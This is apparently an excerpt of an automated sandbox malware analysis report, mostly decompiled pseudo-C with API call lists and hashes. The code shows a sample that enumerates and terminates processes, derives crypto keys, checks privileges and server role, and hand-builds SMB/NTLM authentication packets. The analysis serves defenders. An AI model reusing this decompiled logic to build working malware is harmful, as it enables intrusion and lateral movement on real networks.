                                                                                                                                                                                        											continue;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										break;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									_t82 = _v16;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								_t70 = _t70 + 0x14;
                                                                                                                                                                                        								if( *_t70 != 0) {
                                                                                                                                                                                        									continue;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								break;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							if(_v8 != 0) {
                                                                                                                                                                                        								goto L22;
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                        			}

























                                                                                                                                                                                        APIs
                                                                                                                                                                                        • VirtualProtect.KERNELBASE(?,?,00000004,?), ref: 007B9090
                                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?), ref: 007B90BA
                                                                                                                                                                                        • GetProcAddress.KERNELBASE(00000000,?), ref: 007B90FD
                                                                                                                                                                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 007B913D
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ProtectVirtual$AddressLibraryLoadProc
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3300690313-0
                                                                                                                                                                                        • Opcode ID: d9d75481b38a9177fab0bb03519ec16a350522d8829a70f9f66a4d1b5ea79bd0
                                                                                                                                                                                        • Instruction ID: f0979387edc56aff1e40c1c0389627e038123192257f2f95534b02287ab7098a
                                                                                                                                                                                        • Opcode Fuzzy Hash: d9d75481b38a9177fab0bb03519ec16a350522d8829a70f9f66a4d1b5ea79bd0
                                                                                                                                                                                        • Instruction Fuzzy Hash: A94148B190021AEFDF24CF99C888BA9B7F4FF04315F1584A9D625A7251E778EE80DB50
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,?,00000000,?,?,?,007B62E0,?,?,?,?), ref: 007B60A6
                                                                                                                                                                                        • CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,?,007B62E0,?,?,?,?), ref: 007B60BA
                                                                                                                                                                                        • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000001,?,?,?,?,007B62E0,?,?,?,?), ref: 007B60D3
                                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(?,?,?,?,007B62E0,?,?,?,?), ref: 007B60DF
                                                                                                                                                                                          • Part of subcall function 007B559B: CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000,?,?,00000000), ref: 007B55BC
                                                                                                                                                                                          • Part of subcall function 007B559B: CryptSetKeyParam.ADVAPI32(?,00000003,?,00000000), ref: 007B55CB
                                                                                                                                                                                          • Part of subcall function 007B559B: CryptGetKeyParam.ADVAPI32(?,00000001,00000000,?,00000000), ref: 007B55DA
                                                                                                                                                                                          • Part of subcall function 007B559B: LocalAlloc.KERNEL32(00000040,?), ref: 007B55EE
                                                                                                                                                                                          • Part of subcall function 007B559B: CryptSetKeyParam.ADVAPI32(?,00000001,00000000,00000000), ref: 007B5601
                                                                                                                                                                                          • Part of subcall function 007B559B: LocalFree.KERNEL32(?), ref: 007B5606
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Crypt$Param$Hash$Local$AllocCreateDataDeriveDestroyFree
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 797921460-0
                                                                                                                                                                                        • Opcode ID: 0ebd914a7edf587c45704dd8c1be4c0b0421f8aa6cb6051090947a92affa3110
                                                                                                                                                                                        • Instruction ID: 1224d82095259058224ae71c06ae22abe8d1e44abf6b3124de57c28421a1a28a
                                                                                                                                                                                        • Opcode Fuzzy Hash: 0ebd914a7edf587c45704dd8c1be4c0b0421f8aa6cb6051090947a92affa3110
                                                                                                                                                                                        • Instruction Fuzzy Hash: A2011E71900208FFEB21AF95DCC9EAEBBBDEB04751F104579F201A6150EA759E419B20
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                                                        			E007B84EE() {
                                                                                                                                                                                        				char _v524;
                                                                                                                                                                                        				int _v552;
                                                                                                                                                                                        				void* _v560;
                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                        				int _t8;
                                                                                                                                                                                        				int _t12;
                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t6 = CreateToolhelp32Snapshot(2, 0); // executed
                                                                                                                                                                                        				_t14 = _t6;
                                                                                                                                                                                        				if(_t14 != 0xffffffff) {
                                                                                                                                                                                        					_push( &_v560);
                                                                                                                                                                                        					_v560 = 0x22c;
                                                                                                                                                                                        					_t8 = Process32FirstW(_t14); // executed
                                                                                                                                                                                        					while(_t8 != 0) {
                                                                                                                                                                                        						if(E007B82EE( &_v524) == 0xf4713b0e) {
                                                                                                                                                                                        							E007B841D(_v552);
                                                                                                                                                                                        							L7:
                                                                                                                                                                                        							_t12 = FindCloseChangeNotification(_t14); // executed
                                                                                                                                                                                        							return _t12;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t8 = Process32NextW(_t14,  &_v560);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					goto L7;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t6;
                                                                                                                                                                                        			}











                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007B84FC
                                                                                                                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 007B851B
                                                                                                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 007B853E
                                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 007B8556
                                                                                                                                                                                          • Part of subcall function 007B841D: GetCurrentProcessId.KERNEL32(?,007B8555,?,?), ref: 007B8430
                                                                                                                                                                                          • Part of subcall function 007B841D: OpenProcess.KERNEL32(00000401,00000000,?,?,?,?,007B8555,?,?), ref: 007B844C
                                                                                                                                                                                          • Part of subcall function 007B841D: OpenProcessToken.ADVAPI32(00000000,0000000E,?,00000000,?,?,?,007B8555,?,?), ref: 007B8464
                                                                                                                                                                                          • Part of subcall function 007B841D: DuplicateToken.ADVAPI32(?,00000002,?,?,?,?,007B8555,?,?), ref: 007B847D
                                                                                                                                                                                          • Part of subcall function 007B841D: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 007B84A3
                                                                                                                                                                                          • Part of subcall function 007B841D: CheckTokenMembership.ADVAPI32(?,?,?), ref: 007B84BA
                                                                                                                                                                                          • Part of subcall function 007B841D: TerminateProcess.KERNEL32(00000000,00000000), ref: 007B84CB
                                                                                                                                                                                          • Part of subcall function 007B841D: FreeSid.ADVAPI32(?), ref: 007B84D4
                                                                                                                                                                                          • Part of subcall function 007B841D: CloseHandle.KERNEL32(?), ref: 007B84DD
                                                                                                                                                                                          • Part of subcall function 007B841D: CloseHandle.KERNEL32(?,?,?,?,007B8555,?,?), ref: 007B84E2
                                                                                                                                                                                          • Part of subcall function 007B841D: CloseHandle.KERNEL32(00000000,?,?,?,007B8555,?,?), ref: 007B84E5
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CloseProcess$HandleToken$OpenProcess32$AllocateChangeCheckCreateCurrentDuplicateFindFirstFreeInitializeMembershipNextNotificationSnapshotTerminateToolhelp32
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3524103904-0
                                                                                                                                                                                        • Opcode ID: d90c1fd24b34a8ba35e4dbc71df3f613b98a12523f04cd3218e107f03b6838ff
                                                                                                                                                                                        • Instruction ID: 49feb47fcae90e966398af3f46f733ea973da5520748e9acbf02f6769c806bdd
                                                                                                                                                                                        • Opcode Fuzzy Hash: d90c1fd24b34a8ba35e4dbc71df3f613b98a12523f04cd3218e107f03b6838ff
                                                                                                                                                                                        • Instruction Fuzzy Hash: D4F03631401528A6DB706BB8AC0DFDE7A7CAF09314F244291F915E20A1EB78DD54CE56
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                                                                        			E007B554A(void* __ecx, BYTE* _a4, int _a8) {
                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                        				long** _t8;
                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                        				int _t15;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t15 = 0;
                                                                                                                                                                                        				_v8 = _v8 & 0;
                                                                                                                                                                                        				_t8 =  &_v8;
                                                                                                                                                                                        				__imp__CryptAcquireContextW(_t8, 0, 0, 0x18, 0xf0000000, _t14, __ecx); // executed
                                                                                                                                                                                        				if(_t8 != 0 || GetLastError() == 0x80090016) {
                                                                                                                                                                                        					_t15 = CryptGenRandom(_v8, _a8, _a4);
                                                                                                                                                                                        					CryptReleaseContext(_v8, 0);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t15;
                                                                                                                                                                                        			}








                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,?,007B790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege), ref: 007B5561
                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,007B790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,007B79E8), ref: 007B556B
                                                                                                                                                                                        • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,007B790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,007B79E8), ref: 007B5581
                                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,007B790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,007B79E8), ref: 007B558E
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Crypt$Context$AcquireErrorLastRandomRelease
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2963463078-0
                                                                                                                                                                                        • Opcode ID: 7eabb031d95510e94f9b4fc8c515f8a7d7d4b26b25c2d2ecd2f479f8d5eee8b0
                                                                                                                                                                                        • Instruction ID: d7944247acf9f3acf219b560d26f4553e34407adb9ea48832b298562efd8dda3
                                                                                                                                                                                        • Opcode Fuzzy Hash: 7eabb031d95510e94f9b4fc8c515f8a7d7d4b26b25c2d2ecd2f479f8d5eee8b0
                                                                                                                                                                                        • Instruction Fuzzy Hash: E1F01C36600248FBDF206BA6DD0DFCE7ABAEBC4711F208114F605D2160E6799E11EB24
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 16%
                                                                                                                                                                                        			E007B5507(intOrPtr _a4) {
                                                                                                                                                                                        				void* _t3;
                                                                                                                                                                                        				void* _t7;
                                                                                                                                                                                        				intOrPtr* _t8;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t8 = __imp__CryptAcquireContextW;
                                                                                                                                                                                        				_t3 =  *_t8(_a4, 0, 0, 0x18, 0xf0000000); // executed
                                                                                                                                                                                        				_t7 = _t3;
                                                                                                                                                                                        				if(_t7 == 0 && GetLastError() == 0x80090016) {
                                                                                                                                                                                        					_t7 =  *_t8(_a4, _t7, _t7, 0x18, 8);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t7;
                                                                                                                                                                                        			}







                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,00000000,?,007B62C3,?), ref: 007B5520
                                                                                                                                                                                        • GetLastError.KERNEL32(?,007B62C3,?), ref: 007B5528
                                                                                                                                                                                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008,?,007B62C3,?), ref: 007B553E
Memory Dump Source
• Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AcquireContextCrypt$ErrorLast
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2779411412-0
                                                                                                                                                                                        • Opcode ID: 7f3f5fd10eda1b40eed3e9154dda0902728de803202da2fd54da64da8cb3e994
                                                                                                                                                                                        • Instruction ID: e4c4babe9ba82e1e683a9fbdb60e06b1d715817553bfb4b00421b21a078f4f05
                                                                                                                                                                                        • Opcode Fuzzy Hash: 7f3f5fd10eda1b40eed3e9154dda0902728de803202da2fd54da64da8cb3e994
                                                                                                                                                                                        • Instruction Fuzzy Hash: 9DE0867138471D7FFB301A989C81F963A9EEB28755F208026F700E61D1DAE5AD1457E8
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                                                        			E007B7D4E(void* __ecx) {
                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                        				void** _t9;
                                                                                                                                                                                        				signed char _t12;
                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                        				void* _t15;
                                                                                                                                                                                        				void* _t16;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t9 =  &_v8;
                                                                                                                                                                                        				_t16 = 0;
                                                                                                                                                                                        				_v8 = _v8 & 0;
                                                                                                                                                                                        				__imp__NetServerGetInfo(0, 0x65, _t9, _t15, __ecx); // executed
                                                                                                                                                                                        				_t14 = _v8;
                                                                                                                                                                                        				if(_t9 == 0) {
                                                                                                                                                                                        					_t12 =  *(_t14 + 0x10);
                                                                                                                                                                                        					if((_t12 & 0x00008000) != 0 || (_t12 & 0x00000018) != 0) {
                                                                                                                                                                                        						_t16 = 1;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				if(_t14 != 0) {
                                                                                                                                                                                        					NetApiBufferFree(_t14);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t16;
                                                                                                                                                                                        			}










                                                                                                                                                                                        APIs
                                                                                                                                                                                        • NetServerGetInfo.NETAPI32(00000000,00000065,?,7404C4E0,?,?,007B8C7C), ref: 007B7D5F
                                                                                                                                                                                        • NetApiBufferFree.NETAPI32(?,?,?,007B8C7C), ref: 007B7D82
Memory Dump Source
• Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: BufferFreeInfoServer
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3855943681-0
                                                                                                                                                                                        • Opcode ID: 528765ff973a2da3041b4bf51f49fa2eed2d682d1b5e0ac258fc1b626d445305
                                                                                                                                                                                        • Instruction ID: 974f95bdb117aad91fe21ecb1902622c64c465f29d86bce2182cfff1baed0d84
                                                                                                                                                                                        • Opcode Fuzzy Hash: 528765ff973a2da3041b4bf51f49fa2eed2d682d1b5e0ac258fc1b626d445305
                                                                                                                                                                                        • Instruction Fuzzy Hash: F8E09271706624A7DF3CCB55CD08FFA766CEF80BD1B004218AC41E6110E328DE01C6D0
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        Control-flow Graph

[Control-flow graph of the function at 7b1747 (image not recovered; legend: Executed / Not Executed). Node labels: GetProcessHeap, HeapAlloc, CharUpperW, htons, send, recv, call 7b15a7, rand, memcpy, memset.]
                                                                                                                                                                                        C-Code - Quality: 80%
                                                                                                                                                                                        			E007B1747(intOrPtr _a4, void** _a8, long _a12, void* _a16, signed int _a20, void* _a24) {
                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                        				int _v16;
                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                        				void* _v24;
                                                                                                                                                                                        				void* _v28;
                                                                                                                                                                                        				void* _v32;
                                                                                                                                                                                        				void* _v36;
                                                                                                                                                                                        				void* _v40;
                                                                                                                                                                                        				void _v44;
                                                                                                                                                                                        				void* _v48;
                                                                                                                                                                                        				intOrPtr* _t165;
                                                                                                                                                                                        				signed short _t168;
                                                                                                                                                                                        				int _t170;
                                                                                                                                                                                        				signed short* _t175;
                                                                                                                                                                                        				intOrPtr* _t177;
                                                                                                                                                                                        				void* _t187;
                                                                                                                                                                                        				short _t189;
                                                                                                                                                                                        				short _t193;
                                                                                                                                                                                        				signed char* _t194;
                                                                                                                                                                                        				void* _t198;
                                                                                                                                                                                        				void* _t201;
                                                                                                                                                                                        				signed int _t205;
                                                                                                                                                                                        				void* _t209;
                                                                                                                                                                                        				void* _t212;
                                                                                                                                                                                        				long _t215;
                                                                                                                                                                                        				int _t216;
                                                                                                                                                                                        				void* _t218;
                                                                                                                                                                                        				void* _t222;
                                                                                                                                                                                        				void* _t235;
                                                                                                                                                                                        				short _t237;
                                                                                                                                                                                        				short _t240;
                                                                                                                                                                                        				char _t244;
                                                                                                                                                                                        				char _t245;
                                                                                                                                                                                        				char _t246;
                                                                                                                                                                                        				short _t250;
                                                                                                                                                                                        				void* _t253;
                                                                                                                                                                                        				void* _t257;
                                                                                                                                                                                        				short _t258;
                                                                                                                                                                                        				intOrPtr _t261;
                                                                                                                                                                                        				void* _t264;
                                                                                                                                                                                        				void* _t266;
                                                                                                                                                                                        				signed int _t267;
                                                                                                                                                                                        				void* _t268;
                                                                                                                                                                                        				signed int _t269;
                                                                                                                                                                                        				void* _t271;
                                                                                                                                                                                        				intOrPtr* _t282;
signed int _t285;
intOrPtr _t288;
signed int _t289;
short _t292;
intOrPtr _t293;
WCHAR* _t294;
intOrPtr _t295;
signed char _t297;
signed int _t300;
intOrPtr _t302;
void* _t304;
void* _t305;
signed int* _t308;
void* _t309;
void* _t315;
void* _t319;
void* _t321;
void* _t322;
signed short _t325;
void* _t328;
void* _t329;
void* _t330;
void* _t331;

_t165 = _a16;
_v5 = 0;
_t266 = _t165 + 2;
do {
	_t293 =  *_t165;
	_t165 = _t165 + 2;
} while (_t293 != 0);
_t168 = _t165 - _t266 >> 0x00000001 & 0x0000ffff;
_v12 = _t168;
_t170 = (_t168 & 0x0000ffff) + (_t168 & 0x0000ffff);
_v16 = _t170;
_t294 = HeapAlloc(GetProcessHeap(), 8, _t170 + 2);
_v36 = _t294;
if(_t294 == 0) {
	L53:
	return _v5;
}
_t175 = _a16;
_t304 = _t294 - _t175;
do {
	_t267 =  *_t175 & 0x0000ffff;
	 *(_t304 + _t175) = _t267;
	_t175 =  &(_t175[1]);
} while (_t267 != 0);
CharUpperW(_t294);
_t177 = _a20;
_t268 = _t177 + 2;
do {
	_t295 =  *_t177;
	_t177 = _t177 + 2;
} while (_t295 != 0);
_v32 = _t177 - _t268 >> 0x00000001 & 0x0000ffff;
_t305 = HeapAlloc(GetProcessHeap(), 8, 0x86);
_v28 = _t305;
if(_t305 == 0) {
	L52:
	HeapFree(GetProcessHeap(), 8, _v36);
	goto L53;
}
_t321 =  *_a8;
_t269 = 9;
 *((short*)(_t321 + 0x20)) = 0;
_t187 = memcpy(_t305, _t321, _t269 << 2);
_t329 = _t328 + 0xc;
__imp__#9(0x82);
_t322 = _v28;
 *(_t322 + 2) = _t187;
 *((short*)(_t322 + 0x29)) = 0x1104;
_t189 = 2;
 *((short*)(_t322 + 0x2b)) = _t189;
_t271 = 0x42;
 *((short*)(_t322 + 0x2d)) = 1;
 *((short*)(_t322 + 0x33)) = 0;
_t193 = 0x47;
 *((short*)(_t322 + 0x3d)) = _t193;
 *((char*)(_t322 + 8)) = 0x73;
 *((short*)(_t322 + 0x24)) = 0xff0c;
 *((intOrPtr*)(_t322 + 0x39)) = 0x8000c044;
_t308 = 0x7c35f0;
_t194 = _t322 + 0x3f;
do {
	_t297 =  !( *_t308);
	_t308 =  &(_t308[0]);
	 *_t194 = _t297;
	_t194 =  &(_t194[1]);
	_t271 = _t271 - 1;
} while (_t271 != 0);
__imp__#19(_a4, _t322, 0x86, _t271); // executed
if(_t194 <= 0) {
	L51:
	HeapFree(GetProcessHeap(), 8, _t322);
	goto L52;
}
_t309 = _a24;
__imp__#16(_a4, _t309, 0xffff, 0); // executed
if(_t194 <= 0x84) {
	goto L51;
}
 *((short*)( *_a8 + 0x20)) =  *((intOrPtr*)(_t309 + 0x20));
if( *((intOrPtr*)(_t309 + 9)) != 0xc0000016) {
	goto L51;
}
_t198 = 0x2d;
while(1) {
	_t300 =  *(_t198 + _t309 + 4) ^ 0x00505353;
	if(( *(_t198 + _t309) ^ 0x4d4c544e) == 0 && _t300 == 0 &&  *((intOrPtr*)(_t198 + _t309 + 8)) == 2) {
		break;
	}
	_t198 = _t198 + 1;
	if(_t198 < 0x70) {
		continue;
	}
	goto L51;
}
_v44 =  *((intOrPtr*)(_t198 + _t309 + 0x18));
_v40 =  *((intOrPtr*)(_t198 + _t309 + 0x1c));
 *_a12 =  *((intOrPtr*)(_t198 + _t309 + 0x30));
_t201 = HeapAlloc(GetProcessHeap(), 8, 0x18);
_v24 = _t201;
if(_t201 == 0) {
	goto L51;
}
_t205 = E007B15A7(_a20, (_v32 & 0x0000ffff) + (_v32 & 0x0000ffff), 0,  &_v24, 0x8002); // executed
if(_t205 != 0) {
	L50:
	HeapFree(GetProcessHeap(), 8, _v24);
	goto L51;
}
_a20 = _a20 & _t205;
_t209 = E007B15A7(_v36, _v16, _v24,  &_a20, 0x8003); // executed
if(_t209 != 0) {
	goto L50;
}
_v48 = _a20;
_t212 = HeapAlloc(GetProcessHeap(), 8, 0x10);
_v32 = _t212;
if(_t212 == 0) {
	L49:
	HeapFree(GetProcessHeap(), 8, _a20);
	goto L50;
}
 *_t212 = _v44;
 *((intOrPtr*)(_t212 + 4)) = _v40;
_t215 = _t212 + 8;
_v40 = _t215;
_a12 = _t215;
_v20 = 8;
do {
	_t216 = rand();
	_a12 = _a12 + 1;
	_t70 =  &_v20;
	 *_t70 = _v20 - 1;
	 *_a12 = _t216;
} while ( *_t70 != 0);
_t218 = E007B15A7(_v32, 0x10, _a20,  &_a20, 0x8003); // executed
if(_t218 == 0) {
	_t222 = HeapAlloc(GetProcessHeap(), 8, 0x18);
	_v20 = _t222;
	if(_t222 != 0) {
		_t282 = _v40;
		asm("movsd");
		asm("movsd");
		asm("movsd");
		asm("movsd");
		 *((intOrPtr*)(_t222 + 0x10)) =  *_t282;
		 *((intOrPtr*)(_t222 + 0x14)) =  *((intOrPtr*)(_t282 + 4));
		if(0 == _v12) {
			 *_t222 = 0x55004e;
			 *((intOrPtr*)(_t222 + 4)) = 0x4c004c;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_a12 = (_v12 & 0x0000ffff) + (_v12 & 0x0000ffff) + 0xa4;
                                                                                                                                                                                        						if(0 == _v12) {
                                                                                                                                                                                        							_a12 = _a12 - 0x10;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t264 = HeapAlloc(GetProcessHeap(), 8, _a12);
                                                                                                                                                                                        						if(_t264 != 0) {
                                                                                                                                                                                        							_t285 = 9;
                                                                                                                                                                                        							_t235 = memcpy(_t264,  *_a8, _t285 << 2);
                                                                                                                                                                                        							_t330 = _t329 + 0xc;
                                                                                                                                                                                        							__imp__#9(_a12 + 0xfffffffc);
                                                                                                                                                                                        							_t325 = _v12;
                                                                                                                                                                                        							 *(_t264 + 2) = _t235;
                                                                                                                                                                                        							 *((short*)(_t264 + 0x29)) = 0x1104;
                                                                                                                                                                                        							_t237 = 2;
                                                                                                                                                                                        							 *((short*)(_t264 + 0x2b)) = _t237;
                                                                                                                                                                                        							 *((short*)(_t264 + 0x2d)) = 1;
                                                                                                                                                                                        							_t240 = _t325 + _t325 + 0x60;
                                                                                                                                                                                        							 *((char*)(_t264 + 8)) = 0x73;
                                                                                                                                                                                        							 *((short*)(_t264 + 0x24)) = 0xff0c;
                                                                                                                                                                                        							 *((short*)(_t264 + 0x33)) = _t240;
                                                                                                                                                                                        							if(0 == _t325) {
                                                                                                                                                                                        								 *((short*)(_t264 + 0x33)) = _t240 + 0xfffffff0;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							 *((short*)(_t264 + 0x3d)) =  *((intOrPtr*)(_t264 + 0x33)) + 5;
                                                                                                                                                                                        							_t244 =  *((intOrPtr*)(_t264 + 0x33)) - 2;
                                                                                                                                                                                        							 *((char*)(_t264 + 0x40)) = _t244;
                                                                                                                                                                                        							_t245 = _t244 - 2;
                                                                                                                                                                                        							 *((char*)(_t264 + 0x42)) = _t245;
                                                                                                                                                                                        							_t246 = _t245 - 2;
                                                                                                                                                                                        							 *((char*)(_t264 + 0x44)) = _t246;
                                                                                                                                                                                        							 *((char*)(_t264 + 0x46)) = _t246 - 2;
                                                                                                                                                                                        							 *((intOrPtr*)(_t264 + 0x39)) = 0x8000c044;
                                                                                                                                                                                        							 *((char*)(_t264 + 0x3f)) = 0xa1;
                                                                                                                                                                                        							 *((char*)(_t264 + 0x41)) = 0x30;
                                                                                                                                                                                        							 *((char*)(_t264 + 0x43)) = 0xa2;
                                                                                                                                                                                        							 *((char*)(_t264 + 0x45)) = 4;
                                                                                                                                                                                        							 *((intOrPtr*)(_t264 + 0x47)) = 0x4d4c544e;
